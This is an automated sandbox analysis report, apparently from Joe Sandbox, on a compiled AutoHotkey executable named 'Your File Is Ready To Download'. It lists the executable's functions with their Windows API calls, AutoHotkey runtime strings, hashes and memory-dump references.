Instruction ID: 95d8417c0f1a8f382a4ee89a57459bb809ef3516b214311edc1b132613c27b08
Opcode Fuzzy Hash: 3fa2bfebcbc7caa754ae9a1d361acf40a61b4d2ef6fed00823556ee96360772d
Instruction Fuzzy Hash: ECF18C72204B8086FB569F22E4403E977A1F74CFD8F544526EB4A0B7B9CB3AC891E750

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400203C0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400203FB
FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020417
SizeofResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002042E
LoadResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020441
LockResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002044F

Strings

Could not extract script from EXE., xrefs: 00000001400204B4
>AUTOHOTKEY SCRIPT<, xrefs: 00000001400203DE
>AHK WITH ICON<, xrefs: 000000014002040E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Resource$Find$LoadLockSizeof
String ID: >AHK WITH ICON<$>AUTOHOTKEY SCRIPT<$Could not extract script from EXE.
API String ID: 3127896203-4021547232
Opcode ID: d6fe7a2ab9bb4bfceaf3d131b03556d622f3d43d352a62f836d4007b1b73634c
Instruction ID: 4fa9915d770383e3ceba3c12ba8dbc7288b81bbf8e3835f789446a28df0f8c3f
Opcode Fuzzy Hash: d6fe7a2ab9bb4bfceaf3d131b03556d622f3d43d352a62f836d4007b1b73634c
Instruction Fuzzy Hash: 1A317A71205B8085EB56AB27B8447DA77A4FB4CBD4F08812AAF4A07779DF3CC405CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001FD1E, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 349timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A8E90: malloc.LIBCMT ref: 00000001400A8EB5

SetCurrentDirectoryW.KERNEL32 ref: 000000014001FEDD
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000140020215

Strings

Out of memory., xrefs: 000000014002026B
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140020023
ErrorLevel, xrefs: 000000014001FF81

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Time$CurrentDirectoryFileSystemmalloc
String ID: ErrorLevel$Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2763818370-844184505
Opcode ID: 548aa7f14d302ff422d655c16b8db8386737a864009c306ac2adbd5a4fcc8351
Instruction ID: cea454d1ff267d8dddfd5f0971b3fb9f029145ac597c90deb180777b750286b5
Opcode Fuzzy Hash: 548aa7f14d302ff422d655c16b8db8386737a864009c306ac2adbd5a4fcc8351
Instruction Fuzzy Hash: 65F1BC32200B4081EB669B26E4543E973A1F74DBD8F54452AEF5E1B7BADF78C895C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140034CA5, Relevance: 9.4, APIs: 6, Instructions: 379windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f938fad744871b925cb9a191ea58e040de784671d9ef9e0d9aa366a0406ed2f4
Instruction ID: 0e99c94694e932e4123b4f8210515a5043a547bae0ef887c7790616cbfc6cfa9
Opcode Fuzzy Hash: f938fad744871b925cb9a191ea58e040de784671d9ef9e0d9aa366a0406ed2f4
Instruction Fuzzy Hash: 1AF1A032A0464086FBBB8B67A4403EB67A2E79DBD4F554116FF494BAF5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140034A15, Relevance: 9.4, APIs: 6, Instructions: 360windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 385c99a52f82c787db7813f651a90a7f7685052b680eee4af3a8da334d0f30db
Instruction ID: 25eac62d4e5dfc700f62f9333028012030fd2ea95af16ad25bb177c0525f92cd
Opcode Fuzzy Hash: 385c99a52f82c787db7813f651a90a7f7685052b680eee4af3a8da334d0f30db
Instruction Fuzzy Hash: 48F1B132A0464086FBAB8B67A4403EF67A2E79DBD4F554116FF494BAF5DB38D881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001F919, Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

APIs

wcsncpy.LIBCMT ref: 000000014001F959

Part of subcall function 000000014001F1E0: Shell_NotifyIconW.SHELL32 ref: 000000014001F2CE

SetCurrentDirectoryW.KERNEL32 ref: 000000014001F9D9
IsWindow.USER32 ref: 000000014001FC9D
DestroyWindow.USER32 ref: 000000014001FCBA

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CurrentDestroyDirectoryIconNotifyShell_wcsncpy
String ID:
API String ID: 1905601840-0
Opcode ID: 0828e0cdea0aa086c42065aae2b1be0df3b16609e3b026a98827852c9fc181e8
Instruction ID: eba815331304d250c1791937e5f23ef74a7a0522d19da92e9b23fa157bab9115
Opcode Fuzzy Hash: 0828e0cdea0aa086c42065aae2b1be0df3b16609e3b026a98827852c9fc181e8
Instruction Fuzzy Hash: 0FB19B72604B8486E726DB26E4903E977A0F78CB88F580116EB8E0B7B6CB7AC455D700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400ACC40, Relevance: 6.1, APIs: 4, Instructions: 137fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00000001400ACD4D
FindClose.KERNEL32 ref: 00000001400ACD61
FindFirstFileW.KERNEL32 ref: 00000001400ACDC9
FindClose.KERNEL32 ref: 00000001400ACDDC

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7a0a428579f1c7b9359d3ccd9ed5bc1c56c2f02a59f637aceb6469dd342f9485
Instruction ID: b10f652044382334588a36016033f15b5720062d7861cc5e40244e113047dfa7
Opcode Fuzzy Hash: 7a0a428579f1c7b9359d3ccd9ed5bc1c56c2f02a59f637aceb6469dd342f9485
Instruction Fuzzy Hash: F951E332314B8491EA16DB129548BDA73A5FB98BF4F569315EF69037E4EF38C44AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140088360, Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 604COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 0000000140088656, 0000000140088AE1
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014008889A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-457448710
Opcode ID: 735822e78bffa75d5642fdd73663675dda92776e70ae9bd98a431285dc0bbc70
Instruction ID: 860f5a8a497f6e7cc6376da9d1a84c773342d96c536585e96f7e74c1d9c58392
Opcode Fuzzy Hash: 735822e78bffa75d5642fdd73663675dda92776e70ae9bd98a431285dc0bbc70
Instruction Fuzzy Hash: 7942A773200A808AEB76CF2AD5447E937A1F75CBC8F558612EF594BBA5EB34C691C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CD9B4, Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 00000001400CD9CA
GetVersion.KERNEL32 ref: 00000001400CD9DC
HeapSetInformation.KERNEL32 ref: 00000001400CD9FA

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Heap$CreateInformationVersion
String ID:
API String ID: 3563531100-0
Opcode ID: 485e67b815213ebe75aea5d46a95619b67317113fdcb7fc7ccf1d162a3130600
Instruction ID: b04cb3fe38b125b63014ad02eeab877848254fcf05d1bfd7767625559010cf5d
Opcode Fuzzy Hash: 485e67b815213ebe75aea5d46a95619b67317113fdcb7fc7ccf1d162a3130600
Instruction Fuzzy Hash: 29E0ED7461579083FB8A6B16A8497D92251BB9CBC1F905419EB4A03764DF3CC0468614

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140050076, Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00000001400500B1

Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E

IsIconic.USER32 ref: 00000001400500C7

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundIconicVisibleZoomed
String ID:
API String ID: 2502755998-0
Opcode ID: c8433a945dd130153639f98e41458fc8fe3c1a2b3aae1db4d9fedb456d749ac5
Instruction ID: 6499a9184c1e6f9c34c24ebe9ab9486ad435745bd79f262569d7ba410843448c
Opcode Fuzzy Hash: c8433a945dd130153639f98e41458fc8fe3c1a2b3aae1db4d9fedb456d749ac5
Instruction Fuzzy Hash: BFF0C23160868442E653EB2729503FDA6D16B8DBC4F181120BF834BBB6CF79C4009354

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400ADC60, Relevance: 19.7, APIs: 13, Instructions: 164
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00000001400ADC93
EnumResourceNamesW.KERNEL32 ref: 00000001400ADCFB
FindResourceW.KERNEL32 ref: 00000001400ADD18
LoadResource.KERNEL32 ref: 00000001400ADD2D
LockResource.KERNEL32 ref: 00000001400ADD3F
GetSystemMetrics.USER32 ref: 00000001400ADD5F
FindResourceW.KERNEL32 ref: 00000001400ADDD5
LoadResource.KERNEL32 ref: 00000001400ADDE9
LockResource.KERNEL32 ref: 00000001400ADDF7
SizeofResource.KERNEL32 ref: 00000001400ADE0B
CreateIconFromResourceEx.USER32 ref: 00000001400ADE2E
ExtractIconW.SHELL32 ref: 00000001400ADE8A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Resource$Load$FindIconLock$CreateEnumExtractFromLibraryMetricsNamesSizeofSystem
String ID:
API String ID: 1568753105-0
Opcode ID: ffb817b8c69ba48c99ff27022b2134c4d0023426584ad7ed8cb5ecf69c1e7d2a
Instruction ID: 78f0b144c0c4f371b41ad671c11dcad956fa3e5cfac34bdb993dbd866c53a778
Opcode Fuzzy Hash: ffb817b8c69ba48c99ff27022b2134c4d0023426584ad7ed8cb5ecf69c1e7d2a
Instruction Fuzzy Hash: A251973130179085EA66AF13A4147F972A4BB6CFD4F48452AEF4B4BBA4DB7DC885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140002A02, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 238threadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002A33
GetWindowThreadProcessId.USER32 ref: 0000000140002A4A
GetClassNameW.USER32 ref: 0000000140002A6C
IsDialogMessageW.USER32 ref: 0000000140002AAE
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002ADE
DragFinish.SHELL32 ref: 0000000140003010

Strings

#32770, xrefs: 0000000140002A79

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ClassCurrentDialogDirectoryDragFinishForegroundMessageNameProcessThread
String ID: #32770
API String ID: 3456408793-463685578
Opcode ID: 9582ef0d1eb55107b69af7a2158272834f0dac25b62553382c3d829a3df79961
Instruction ID: 6c7f57e873ea1f2ac3e5c59e57f37a7b4e9ec96122aeafd1b531d591dce64036
Opcode Fuzzy Hash: 9582ef0d1eb55107b69af7a2158272834f0dac25b62553382c3d829a3df79961
Instruction Fuzzy Hash: CAC11A72205B858AFB66CF27A9543E937A0B78DBD4F144126EF491BBB4DB38C981C710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CC264, Relevance: 18.1, APIs: 12, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00000001400CC276
_FF_MSGBANNER.LIBCMT ref: 00000001400CC2E1
_FF_MSGBANNER.LIBCMT ref: 00000001400CC30C
_RTC_Initialize.LIBCMT ref: 00000001400CC325
_amsg_exit.LIBCMT ref: 00000001400CC339
GetCommandLineW.KERNEL32 ref: 00000001400CC33E
__wsetargv.LIBCMT ref: 00000001400CC357
_amsg_exit.LIBCMT ref: 00000001400CC365
_amsg_exit.LIBCMT ref: 00000001400CC378
_cinit.LIBCMT ref: 00000001400CC382
_amsg_exit.LIBCMT ref: 00000001400CC38D
_wwincmdln.LIBCMT ref: 00000001400CC392

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _amsg_exit$CommandInfoInitializeLineStartup__wsetargv_cinit_wwincmdln
String ID:
API String ID: 697445056-0
Opcode ID: 1d503fbbcda832882e8a9619ec5c8f30e94001e0008c0cdb69518c1c829d2806
Instruction ID: 9368ea0ec24b77c97e4d18523a0ebe8af8c7395c2174bbe91fb1f2ab21c7336b
Opcode Fuzzy Hash: 1d503fbbcda832882e8a9619ec5c8f30e94001e0008c0cdb69518c1c829d2806
Instruction Fuzzy Hash: 62414B3062874182FB6FABA3E5557ED2291AB9D7C4F008139FB46872F3EE38C9459611

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002E080, Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.LIBCMT ref: 000000014002E101

Strings

_$#@, xrefs: 000000014002E13E
variable, xrefs: 000000014002E163
The following %s name contains an illegal character:"%-1.300s", xrefs: 000000014002E16A
Illegal parameter name., xrefs: 000000014002E275
Out of memory., xrefs: 000000014002E4A7
Variable name too long., xrefs: 000000014002E0CE
ErrorLevel, xrefs: 000000014002E1DB

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: wcsncpy
String ID: ErrorLevel$Illegal parameter name.$Out of memory.$The following %s name contains an illegal character:"%-1.300s"$Variable name too long.$_$#@$variable
API String ID: 322933527-511781698
Opcode ID: fef627082e009b1956e834ff8a6167b0fa8f3d850a97a3b73f2e3d80e6ad6322
Instruction ID: 951995fd0d9102cb58700664fbdfea69c13a9f70c1cc31b842a6c829c38dd2e9
Opcode Fuzzy Hash: fef627082e009b1956e834ff8a6167b0fa8f3d850a97a3b73f2e3d80e6ad6322
Instruction Fuzzy Hash: A5128B32215BC086EB62DF16E4803D973A5F788BE4F54022AEB9D47BE9DB38C955C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001A010, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 86
registrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ActivateKeyboardLayout.USER32 ref: 000000014001A022
GetKeyboardLayoutNameW.USER32 ref: 000000014001A05A
RegOpenKeyExW.KERNEL32 ref: 000000014001A08A
RegQueryValueExW.KERNEL32 ref: 000000014001A0DA
RegCloseKey.ADVAPI32 ref: 000000014001A0EA
LoadLibraryW.KERNEL32 ref: 000000014001A153
ActivateKeyboardLayout.USER32 ref: 000000014001A166

Strings

Layout File, xrefs: 000000014001A0A8
SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 000000014001A036

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: KeyboardLayout$Activate$CloseLibraryLoadNameOpenQueryValue
String ID: Layout File$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 530040227-1038698864
Opcode ID: f78ed5f12aae807a10c71693ae0e7398b7120a842c33079b0cd378eee554b31c
Instruction ID: 80c8a57b74420098663485768f92c7745f417b110f1ff33b5c08b2ad1e47dad3
Opcode Fuzzy Hash: f78ed5f12aae807a10c71693ae0e7398b7120a842c33079b0cd378eee554b31c
Instruction Fuzzy Hash: 7B316F31705AC191FB729B16E4547FE72A1FBCABD4F444224EB8947AA8EB7DC445C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038325, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 233
windowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059

Strings

ahk_default, xrefs: 00000001400383F3
%s\%s, xrefs: 000000014003834D

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID: %s\%s$ahk_default
API String ID: 1623861271-75935552
Opcode ID: fc73a900c8346e95abc61a0e86a74cd7a13adcc0e7ab337c42d9fa0be3a60fa4
Instruction ID: 048c2e1420f72b08f6da745a0fd0e92c76516b67efe5bb1984d62529e4ea00e7
Opcode Fuzzy Hash: fc73a900c8346e95abc61a0e86a74cd7a13adcc0e7ab337c42d9fa0be3a60fa4
Instruction Fuzzy Hash: 8DB13771604B4086FB6B8B27A8403EA77A1F78DBD4F544126FB9947AF5DB38C885C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D1270, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D12D6
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D12E1
_wsopen_s.LIBCMT ref: 00000001400D1500

Part of subcall function 00000001400C9144: _errno.LIBCMT ref: 00000001400C9162
Part of subcall function 00000001400C9144: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C916D

Strings

UTF-8, xrefs: 00000001400D1469
UNICODE, xrefs: 00000001400D14AF
